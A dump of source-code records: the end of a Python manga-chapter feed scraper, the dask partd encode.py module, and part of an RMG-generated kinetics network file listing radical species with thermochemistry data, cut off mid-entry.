segmentDivs = container.find_all("div", class_="group", recursive=False)
ret = []
for segment in segmentDivs:
chaps = segment.find_all("div", class_="element")
for chap in chaps:
dlLink = chap.find("div", class_="icon_wrapper").a["href"]
dlTitle = chap.find("div", class_="title").get_text()
dlTitle = dlTitle.replace(":", " -") # Can't have colons in filenames
# print("dlLink", dlLink, dlTitle)
item = {}
chapDate = chap.find("div", class_="meta_r")
datestr = list(chapDate)[-1]
datestr.strip(", ")
date = dateutil.parser.parse(datestr, fuzzy=True)
item["originName"] = "{series} - {file}".format(series=seriesName, file=dlTitle)
item["sourceUrl"] = dlLink
item["seriesName"] = seriesName
item["retreivalTime"] = calendar.timegm(date.timetuple())
# print("Item", item)
ret.append(item)
return ret
def getSeriesUrls(self):
ret = []
soup = self.wg.getSoup(self.feedUrl)
content = soup.find('div', class_='ls1')
divs = content.find_all("div", class_="item")
for div in divs:
# First a in the div is the title image
url = div.a["href"]
url = urllib.parse.urljoin(self.urlBase, url)
text = div.a['title']
ret.append((url, text))
return ret
def getAllItems(self):
# for item in items:
# self.log.info( item)
#
self.log.info( "Loading Mc Items")
ret = []
seriesPages = self.getSeriesUrls()
for item in seriesPages:
itemList = self.getItemPages(item)
for item in itemList:
ret.append(item)
if not runStatus.run:
self.log.info( "Breaking due to exit flag being set")
break
self.log.info("Found %s total items", len(ret))
return ret
def go(self):
self.resetStuckItems()
self.log.info("Getting feed items")
feedItems = self.getAllItems()
self.log.info("Processing feed Items")
self.processLinksIntoDB(feedItems)
self.log.info("Complete")
if __name__ == "__main__":
import utilities.testBase as tb
with tb.testSetup(startObservers=False):
mon = FeedLoader()
# mon.getSeriesUrls()
mon.getItemPages(('http://mangapark.com/manga/zai-x-10-yamauchi-yasunobu', 'Zai x 10'))
# mon.go()
| [
"[email protected]"
] | |
6605bcf24b243c6cbe8ac5a6bd439b0d5204fe19 | dd05adda58c40b3a6593d89c53be1ce64df2be0a | /partd/encode.py | 3e3a15f7966f18e7ac388517e92437fc832a5ecd | [] | permissive | dask/partd | 4fb98971d4f9b891ca944584517be3157e06de81 | 4183caf149b686538752608bac6acbaa052dba23 | refs/heads/main | 2023-07-20T04:38:51.234966 | 2023-07-17T21:12:35 | 2023-07-17T21:12:35 | 35,185,364 | 94 | 35 | BSD-3-Clause | 2023-07-17T21:12:37 | 2015-05-06T22:08:45 | Python | UTF-8 | Python | false | false | 1,287 | py | from .core import Interface
from .file import File
from toolz import valmap
from .utils import frame, framesplit
class Encode(Interface):
def __init__(self, encode, decode, join, partd=None):
if not partd or isinstance(partd, str):
partd = File(partd)
self.partd = partd
self.encode = encode
self.decode = decode
self.join = join
Interface.__init__(self)
def __getstate__(self):
return self.__dict__
__setstate__ = Interface.__setstate__
def append(self, data, **kwargs):
data = valmap(self.encode, data)
data = valmap(frame, data)
self.partd.append(data, **kwargs)
def _get(self, keys, **kwargs):
raw = self.partd._get(keys, **kwargs)
return [self.join([self.decode(frame) for frame in framesplit(chunk)])
for chunk in raw]
def delete(self, keys, **kwargs):
return self.partd.delete(keys, **kwargs)
def _iset(self, key, value, **kwargs):
return self.partd.iset(key, frame(self.encode(value)), **kwargs)
def drop(self):
return self.partd.drop()
@property
def lock(self):
return self.partd.lock
def __exit__(self, *args):
self.drop()
self.partd.__exit__(*args)
| [
"[email protected]"
] | |
6612c6f4c3bdadebf80c104974b4eb724807ed7d | 41fd80f9ccc72a17c2db16b7019312a87d3181e8 | /zhang_local/pdep/network2841_1.py | 7b1d642fe6767e4eb58b8f5522f08e99ec0b79c4 | [] | no_license | aberdeendinius/n-heptane | 1510e6704d87283043357aec36317fdb4a2a0c34 | 1806622607f74495477ef3fd772908d94cff04d9 | refs/heads/master | 2020-05-26T02:06:49.084015 | 2019-07-01T15:12:44 | 2019-07-01T15:12:44 | 188,069,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47,701 | py | species(
label = '[CH]=CC([CH2])([CH2])[O](9680)',
structure = SMILES('[CH]=CC([CH2])([CH2])[O]'),
E0 = (664.937,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,3010,987.5,1337.5,450,1655,3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,212.485,212.488,212.49,212.49,1273.28,1273.28],'cm^-1')),
HinderedRotor(inertia=(0.507989,'amu*angstrom^2'), symmetry=1, barrier=(16.2759,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.00234803,'amu*angstrom^2'), symmetry=1, barrier=(16.2961,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(1.49098,'amu*angstrom^2'), symmetry=1, barrier=(47.7709,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.39957,0.0593922,-6.51795e-05,3.99484e-08,-1.00652e-11,80065.3,25.89], Tmin=(100,'K'), Tmax=(954.892,'K')), NASAPolynomial(coeffs=[9.64884,0.0248357,-1.0895e-05,2.04843e-09,-1.42428e-13,78489.8,-13.527], Tmin=(954.892,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(664.937,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)2OJ) + radical(Cds_P) + radical(C=CC(C)(O)CJ)"""),
)
species(
label = 'C#C(582)',
structure = SMILES('C#C'),
E0 = (214.792,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([750,770,3400,2100,559.488,618.58,3890.62],'cm^-1')),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (26.0373,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(1737.73,'J/mol'), sigma=(4.1,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=2.5, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.03575,0.00771239,2.53493e-06,-1.08133e-08,5.50757e-12,25852.6,4.54461], Tmin=(100,'K'), Tmax=(888.627,'K')), NASAPolynomial(coeffs=[5.76205,0.00237159,-1.49583e-07,-2.19155e-11,2.21779e-15,25094.5,-9.82608], Tmin=(888.627,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(214.792,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(87.302,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Ct-CtH) + group(Ct-CtH)"""),
)
species(
label = '[CH2]C(=C)[O](4273)',
structure = SMILES('[CH2]C(=C)[O]'),
E0 = (88.2866,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650,350,440,435,1725,3000,3100,440,815,1455,1000,510.595],'cm^-1')),
HinderedRotor(inertia=(0.0480287,'amu*angstrom^2'), symmetry=1, barrier=(8.88265,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (56.0633,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3365.98,'J/mol'), sigma=(5.64088,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=525.76 K, Pc=42.55 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.6374,0.0235792,5.32605e-07,-2.30624e-08,1.26355e-11,10673.5,14.3058], Tmin=(100,'K'), Tmax=(894.06,'K')), NASAPolynomial(coeffs=[10.3562,0.00670937,-7.99446e-07,2.86693e-11,-3.46262e-16,8587.33,-26.0166], Tmin=(894.06,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(88.2866,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(178.761,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-(Cds-Cd)H) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsOs) + group(Cds-CdsHH) + radical(C=C(C)OJ) + radical(C=C(O)CJ)"""),
)
species(
label = 'H(8)',
structure = SMILES('[H]'),
E0 = (211.805,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,25474.2,-0.444973], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,25474.2,-0.444973], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.805,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'C#CC([CH2])([CH2])[O](10603)',
structure = SMILES('C#CC([CH2])([CH2])[O]'),
E0 = (580.75,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([750,770,3400,2100,3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,2175,525,342.505,342.506,342.508,342.51,342.511,342.511],'cm^-1')),
HinderedRotor(inertia=(1.06573,'amu*angstrom^2'), symmetry=1, barrier=(88.7293,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(1.06581,'amu*angstrom^2'), symmetry=1, barrier=(88.7291,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.162808,'amu*angstrom^2'), symmetry=1, barrier=(13.5539,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (81.0926,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.851998,0.0708558,-9.20572e-05,5.64386e-08,-1.15125e-11,69960.1,21.8491], Tmin=(100,'K'), Tmax=(759.885,'K')), NASAPolynomial(coeffs=[13.8222,0.0146178,-4.80407e-06,7.34239e-10,-4.38786e-14,67641.5,-39.4496], Tmin=(759.885,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(580.75,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(245.277,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Ct-CtCs) + group(Ct-CtH) + radical(CC(C)2OJ) + radical(CJC(C)2O) + radical(CJC(C)2O)"""),
)
species(
label = 'CH2(T)(28)',
structure = SMILES('[CH2]'),
E0 = (381.37,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1066.91,2790.99,3622.37],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.01192,-0.000154979,3.26298e-06,-2.40422e-09,5.69497e-13,45867.7,0.5332], Tmin=(100,'K'), Tmax=(1104.58,'K')), NASAPolynomial(coeffs=[3.14983,0.00296674,-9.76056e-07,1.54115e-10,-9.50338e-15,46058.1,4.77808], Tmin=(1104.58,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(381.37,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(T)""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = '[CH]=CC(=C)[O](5179)',
structure = SMILES('[CH]=CC(=C)[O]'),
E0 = (264.929,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2950,3100,1380,975,1025,1650,350,440,435,1725,3010,987.5,1337.5,450,1655,180],'cm^-1')),
HinderedRotor(inertia=(0.979636,'amu*angstrom^2'), symmetry=1, barrier=(22.5238,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (68.074,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3512.15,'J/mol'), sigma=(5.74623,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=548.59 K, Pc=42 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.41648,0.0452197,-4.57103e-05,2.25525e-08,-4.15485e-12,31966.6,18.4199], Tmin=(100,'K'), Tmax=(1540.92,'K')), NASAPolynomial(coeffs=[13.6856,0.00610864,-5.68369e-07,-3.63413e-11,6.19928e-15,29047.6,-43.2788], Tmin=(1540.92,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(264.929,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(203.705,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-(Cds-Cd)H) + group(Cds-Cds(Cds-Cds)O2s) + group(Cds-Cds(Cds-Cds)H) + group(Cds-CdsHH) + group(Cds-CdsHH) + radical(Cds_P) + radical(C=C(C)OJ)"""),
)
species(
label = 'O(T)(63)',
structure = SMILES('[O]'),
E0 = (243.034,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (15.9994,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,29230.2,4.09104], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,29230.2,4.09104], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(243.034,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""O(T)""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = '[CH]=CC([CH2])=C(6418)',
structure = SMILES('[CH]=CC([CH2])=C'),
E0 = (454.926,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2950,3100,1380,975,1025,1650,350,440,435,1725,3120,650,792.5,1650,3010,987.5,1337.5,450,1655],'cm^-1')),
HinderedRotor(inertia=(1.24264,'amu*angstrom^2'), symmetry=1, barrier=(28.5706,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(1.24122,'amu*angstrom^2'), symmetry=1, barrier=(28.5382,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (66.1011,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.78106,0.037761,-5.50502e-07,-3.25865e-08,1.70814e-11,54805,16.5508], Tmin=(100,'K'), Tmax=(940.402,'K')), NASAPolynomial(coeffs=[14.417,0.0116883,-3.10524e-06,5.17928e-10,-3.8287e-14,51204.7,-50.1403], Tmin=(940.402,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(454.926,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(249.434,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cds-Cds(Cds-Cds)Cs) + group(Cds-Cds(Cds-Cds)H) + group(Cds-CdsHH) + group(Cds-CdsHH) + radical(Cds_P) + radical(Allyl_P)"""),
)
species(
label = '[CH]=[CH](583)',
structure = SMILES('[CH]=[CH]'),
E0 = (536.342,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([637.691,1081.65,1081.98,1082.08,3058.36,3477.84],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (26.0373,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.83395,-0.000554326,2.20867e-05,-2.90276e-08,1.14365e-11,64516.9,6.06922], Tmin=(100,'K'), Tmax=(916.167,'K')), NASAPolynomial(coeffs=[5.69903,0.00213261,-4.3877e-08,-2.1344e-11,5.56752e-16,63720.6,-5.24595], Tmin=(916.167,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(536.342,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cds-CdsHH) + group(Cds-CdsHH) + radical(Cds_P) + radical(Cds_P)"""),
)
species(
label = '[CH2][C]([CH2])[O](10271)',
structure = SMILES('[CH2][C]([CH2])[O]'),
E0 = (537.173,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([360,370,350,3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,278.503],'cm^-1')),
HinderedRotor(inertia=(0.00215299,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0939305,'amu*angstrom^2'), symmetry=1, barrier=(5.13965,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (56.0633,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.0694,0.0447257,-6.5608e-05,5.12452e-08,-1.57124e-11,64674.3,16.4544], Tmin=(100,'K'), Tmax=(870.707,'K')), NASAPolynomial(coeffs=[8.27065,0.0130302,-5.47972e-06,9.76923e-10,-6.45299e-14,63716,-11.9064], Tmin=(870.707,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(537.173,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(174.604,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(C2CsJOH) + radical(CJCO) + radical(CC(C)OJ) + radical(CJCO)"""),
)
species(
label = '[CH2]C([CH2])([O])[C]=C(10604)',
structure = SMILES('[CH2]C([CH2])([O])[C]=C'),
E0 = (655.683,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.3887,0.0610877,-7.5548e-05,5.49349e-08,-1.65708e-11,78951.1,25.9991], Tmin=(100,'K'), Tmax=(801.647,'K')), NASAPolynomial(coeffs=[8.16619,0.02727,-1.22704e-05,2.31222e-09,-1.60016e-13,77864.5,-5.20003], Tmin=(801.647,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(655.683,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)(O)CJ) + radical(Cds_S) + radical(C=CC(C)2OJ)"""),
)
species(
label = '[CH]=[C]C([CH2])([CH2])O(10605)',
structure = SMILES('[CH]=[C]C([CH2])([CH2])O'),
E0 = (673.676,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,1685,370,3615,1277.5,1000,3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.938906,0.0707141,-9.39482e-05,6.32477e-08,-1.56302e-11,81131.8,26.8095], Tmin=(100,'K'), Tmax=(732.008,'K')), NASAPolynomial(coeffs=[11.7978,0.020118,-8.18144e-06,1.45039e-09,-9.63171e-14,79307.8,-23.7905], Tmin=(732.008,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(673.676,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(266.063,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_S) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)(O)CJ) + radical(Cds_P)"""),
)
species(
label = '[CH]=[C]C([CH2])(C)[O](10606)',
structure = SMILES('[CH]=[C]C([CH2])(C)[O]'),
E0 = (689.335,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000,1685,370,180,180,180,495.024,495.028,3719.26],'cm^-1')),
HinderedRotor(inertia=(0.278085,'amu*angstrom^2'), symmetry=1, barrier=(15.0854,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(2.14184,'amu*angstrom^2'), symmetry=1, barrier=(49.2451,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0135912,'amu*angstrom^2'), symmetry=1, barrier=(2.36333,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.48423,0.0580753,-6.45425e-05,4.11885e-08,-1.09143e-11,82996.1,25.8786], Tmin=(100,'K'), Tmax=(906.473,'K')), NASAPolynomial(coeffs=[8.75212,0.0260042,-1.14723e-05,2.15791e-09,-1.49873e-13,81678.5,-8.47106], Tmin=(906.473,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(689.335,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_P) + radical(Cds_S) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)2OJ)"""),
)
species(
label = '[CH]=[C]C([CH2])([CH2])[O](10607)',
structure = SMILES('[CH]=[C]C([CH2])([CH2])[O]'),
E0 = (902.779,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,3120,650,792.5,1650,323.267,323.276,323.292,323.296,323.33,2447.34],'cm^-1')),
HinderedRotor(inertia=(0.00161275,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0754417,'amu*angstrom^2'), symmetry=1, barrier=(5.59538,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.560711,'amu*angstrom^2'), symmetry=1, barrier=(41.5871,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (81.0926,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.21071,0.0659442,-9.73829e-05,7.98066e-08,-2.60472e-11,108675,27.0341], Tmin=(100,'K'), Tmax=(832.904,'K')), NASAPolynomial(coeffs=[8.74506,0.0238358,-1.08787e-05,2.02702e-09,-1.37856e-13,107626,-6.70352], Tmin=(832.904,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(902.779,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(245.277,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_P) + radical(C=CC(C)(O)CJ) + radical(Cds_S) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)2OJ)"""),
)
species(
label = '[CH][CH]CC(=C)[O](6535)',
structure = SMILES('[CH][CH]CC(=C)[O]'),
E0 = (525.606,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2950,3100,1380,975,1025,1650,350,440,435,1725,3025,407.5,1350,352.5,432.682,434.839,435.426,440.02,2066.26,2067.16],'cm^-1')),
HinderedRotor(inertia=(0.000853968,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.000852283,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0419231,'amu*angstrom^2'), symmetry=1, barrier=(5.71597,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.57858,0.0523444,-4.95585e-05,2.63723e-08,-5.77379e-12,63303.7,26.3127], Tmin=(100,'K'), Tmax=(1093.65,'K')), NASAPolynomial(coeffs=[9.68531,0.0226937,-8.89017e-06,1.58129e-09,-1.06645e-13,61530.6,-13.5231], Tmin=(1093.65,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(525.606,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-(Cds-Cd)H) + group(Cs-CsCsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cds-CdsCsOs) + group(Cds-CdsHH) + radical(CCJ2_triplet) + radical(C=C(C)OJ) + radical(RCCJC)"""),
)
species(
label = '[CH]=CC1([CH2])CO1(9310)',
structure = SMILES('[CH]=CC1([CH2])CO1'),
E0 = (409.021,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2750,3150,900,1100,3010,987.5,1337.5,450,1655,3000,3100,440,815,1455,1000,200,800,914.286,1028.57,1142.86,1257.14,1371.43,1485.71,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
